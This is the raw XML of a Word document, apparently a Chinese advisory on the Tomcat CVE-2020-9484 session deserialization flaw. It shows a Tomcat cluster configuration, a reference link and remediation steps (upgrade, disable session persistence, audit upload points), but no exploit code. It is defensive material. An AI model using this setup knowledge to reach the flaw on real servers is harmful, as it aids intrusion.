        <w:t xml:space="preserve">                        address="228.0.0.4"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B0E1CC" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                        port="45564"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D3358A" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                        frequency="500"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B9AE4D" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dropTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="3000"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C60782B" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                      &lt;Receiver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org.apache.catalina.tribes.transport.nio.NioReceiver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEEEC4D" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                        address="123.123.123.123"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EC2847" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                        port="5000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D2119F" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>selectorTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="100"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFAD4E8" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>maxThreads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="6"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C6A173" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462C7219" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                      &lt;Sender className="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>org.apache</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.catalina.tribes.transport.ReplicationTransmitter"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32220133" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        &lt;Transport className="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>org.apache.catalina.tribes.transport.nio.PooledParallelSender</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D94CC61" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                      &lt;/Sender&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307190B0" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                    &lt;/Channel&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC8758D" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18524BE3" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                    &lt;Valve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org.apache.catalina.ha.tcp.ReplicationValve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2835F6A5" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                      filter=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>".*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>\.gif;.*\.js;.*\.jpg;.*\.png;.*\.htm;.*\.html;.*\.css;.*\.txt;"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3943CDBE" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7938B588" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                    &lt;Deployer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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.catalina.ha.deploy.FarmWarDeployer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F991580" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                  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>/war-temp/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDA82F9" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                  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>/war-deploy/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDF827F" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                  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>/war-listen/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9DF550" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>watchEnabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D8DA3A" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4438A695" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">                    &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ClusterListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> className="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>org.apache</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.catalina.ha.session.ClusterSessionListener"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5B6EDB" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">            &lt;/Cluster&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB8A165" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">        &lt;/Engine&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481497BA" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve">  &lt;/Service&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590D93F5" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t>&lt;/Server&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F21297" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="79C01CF8" w14:textId="58622B03" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0008568C" w:rsidRPr="0008568C">
        <w:t>https://www.freebuf.com/vuls/245232.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A244882" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="3CFE8B27" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>四、修复方案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2D2E8A" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="3C5F0FAB" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t>1）升级tomcat至最新版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E8DB0E" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="712869F2" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t>2）关闭session持久化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36755C28" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="4F5D2C18" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t>3）检查项目中是否存在文件名和后缀均可控的上传点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44716C16" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706"/>
    <w:p w14:paraId="4E4C59E3" w14:textId="77777777" w:rsidR="00202706" w:rsidRDefault="00202706" w:rsidP="00202706">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB10258" w14:textId="0B593F1E" w:rsidR="00571422" w:rsidRDefault="00571422" w:rsidP="00202706"/>
    <w:sectPr w:rsidR="00571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9098E" w14:textId="77777777" w:rsidR="00B7517D" w:rsidRDefault="00B7517D" w:rsidP="00202706">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="50167BBC" w14:textId="77777777" w:rsidR="00B7517D" w:rsidRDefault="00B7517D" w:rsidP="00202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8E15C" w14:textId="77777777" w:rsidR="00B7517D" w:rsidRDefault="00B7517D" w:rsidP="00202706">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="09C05BBE" w14:textId="77777777" w:rsidR="00B7517D" w:rsidRDefault="00B7517D" w:rsidP="002027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2B6"/>
    <w:rsid w:val="0008568C"/>
    <w:rsid w:val="00202706"/>
    <w:rsid w:val="003B2199"/>
    <w:rsid w:val="004E400E"/>
    <w:rsid w:val="00571422"/>
    <w:rsid w:val="005C75DC"/>
    <w:rsid w:val="005D015D"/>
    <w:rsid w:val="006973A0"/>
    <w:rsid w:val="00990C46"/>
    <w:rsid w:val="009921CF"/>
    <w:rsid w:val="00B202B6"/>
    <w:rsid w:val="00B54151"/>
    <w:rsid w:val="00B7517D"/>
    <w:rsid w:val="00F8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3B37B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9ED16AFE-9842-47C1-BE9B-592FB5239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270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27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2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2706"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004E400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E40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asahiro331/CVE-2020-9484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573</Words>
  <Characters>3270</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>27</Lines>
  <Paragraphs>7</Paragraphs>
  <ScaleCrop>false</ScaleCrop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杨咏霖</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>子豪 李</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-09T02:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-12T10:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>